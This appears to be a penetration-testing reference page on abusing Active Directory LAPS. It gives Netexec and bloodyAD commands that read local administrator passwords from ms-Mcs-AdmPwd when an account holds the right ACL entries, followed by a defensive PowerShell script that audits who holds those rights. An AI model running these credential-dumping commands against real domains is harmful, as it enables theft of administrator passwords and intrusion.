LAPS

On a computer where LAPS is in use, the LAPS client-side extension AdmPwd.dll is present at the following path:

```powershell
dir "c:\Program Files\laps\cse\AdmPwd.dll"
```

This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights over a target computer configured for LAPS (or, for domain-wide replication, the combination of GetChanges with either GetChangesInFilteredSet or GetChangesAll). The attacker can then read the LAPS password stored on the computer account, i.e. the password of the computer's local administrator. Because ms-Mcs-AdmPwd is a confidential attribute, a plain read-property right is not enough: reading it requires the extended right (CONTROL_ACCESS) on that attribute, which is why these ACL entries are the ones worth auditing.

Netexec

```bash
nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps
```

Restrict the query to computers whose name matches a pattern:

```bash
nxc ldap DC_HOST -d DOMAIN -u USER -p PASSWORD --module laps -O computer="us-d*"
```

BloodyAD

```bash
bloodyAD --host DC_IP -d DOMAIN -u USER -p PASSWORD get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
```
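To find out which principals in your own domain hold the rights described above, the following audit script (added here; it is not part of the original page nor of any of the tools it mentions) lists every principal granted GenericAll, or an ExtendedRight covering ms-Mcs-AdmPwd, on each LAPS-managed computer. It assumes the RSAT ActiveDirectory module in a domain-joined PowerShell session and a forest where the legacy LAPS schema extension has been applied.

```powershell
# Added audit example: who can read ms-Mcs-AdmPwd on LAPS-managed computers?
# Assumes the RSAT ActiveDirectory module (provides the AD: drive).
Import-Module ActiveDirectory

# The schemaIDGUID of ms-Mcs-AdmPwd is generated per forest when the LAPS
# schema extension is installed, so look it up instead of hard-coding it.
$schemaNC   = (Get-ADRootDSE).schemaNamingContext
$attr       = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(name=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
$admPwdGuid = [guid]$attr.schemaIDGUID
$allRights  = [guid]'00000000-0000-0000-0000-000000000000'   # ACE applying to all extended rights

$extendedRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$genericAll    = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll

# Only computers LAPS actually manages carry an expiration timestamp.
$computers = Get-ADComputer -LDAPFilter '(ms-Mcs-AdmPwdExpirationTime=*)'

$results = foreach ($c in $computers) {
    # Get-Acl on the AD: drive returns explicit and inherited ACEs of the object.
    $acl = Get-Acl -Path "AD:\$($c.DistinguishedName)"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = $ace.ActiveDirectoryRights

        # CONTROL_ACCESS on the attribute itself, or on all extended rights
        # (AllExtendedRights), is what unlocks the confidential attribute.
        $hasExtended = (($rights -band $extendedRight) -ne 0) -and
                       ($ace.ObjectType -eq $admPwdGuid -or $ace.ObjectType -eq $allRights)
        # GenericAll implies every right, including the one above.
        $hasGeneric  = (($rights -band $genericAll) -eq $genericAll)

        if ($hasExtended -or $hasGeneric) {
            [pscustomobject]@{
                Computer  = $c.Name
                Principal = $ace.IdentityReference.Value
                Rights    = $rights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Domain Admins and SYSTEM are expected; any other principal deserves review.
$results | Sort-Object Principal, Computer | Format-Table -AutoSize
```

The LAPS management module (AdmPwd.PS) ships Find-AdmPwdExtendedRights for the same purpose on a per-OU basis; the script above is useful where that module is not installed or when you want per-computer output.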